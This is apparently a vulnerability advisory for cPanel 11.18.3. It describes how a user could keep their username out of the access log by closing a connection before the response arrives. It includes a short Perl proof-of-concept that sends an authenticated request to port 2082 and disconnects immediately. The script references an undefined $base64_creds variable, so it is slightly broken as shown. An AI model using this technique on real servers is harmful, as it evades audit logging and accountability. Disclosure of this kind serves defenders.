cPanel 11.18.3-STABLE_21703 - bypass logging of username to cPanel and WHM



DESCRIPTION


If a user made a request to cPanel or WHM, then immediately closed the connection without waiting for a response, while the request would be logged to /usr/local/cpanel/logs/access_log, the username of the user that made the request would not be included in the log.


#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket::INET;

my $sock = IO::Socket::INET->new(
    PeerAddr => '127.0.0.1',
    PeerPort => '2082',
    Proto    => 'tcp',
    Timeout  => '3',
);

print $sock "GET /frontend/x3/index.html HTTP/1.1\r\n";
print $sock "Host: localhost:2082\r\n";
print $sock "Authorization: Basic $base64_creds\r\n\r\n";
close $sock;



IMPACT


Users could issue requests to cpsrvd that did not contain their username in the logs.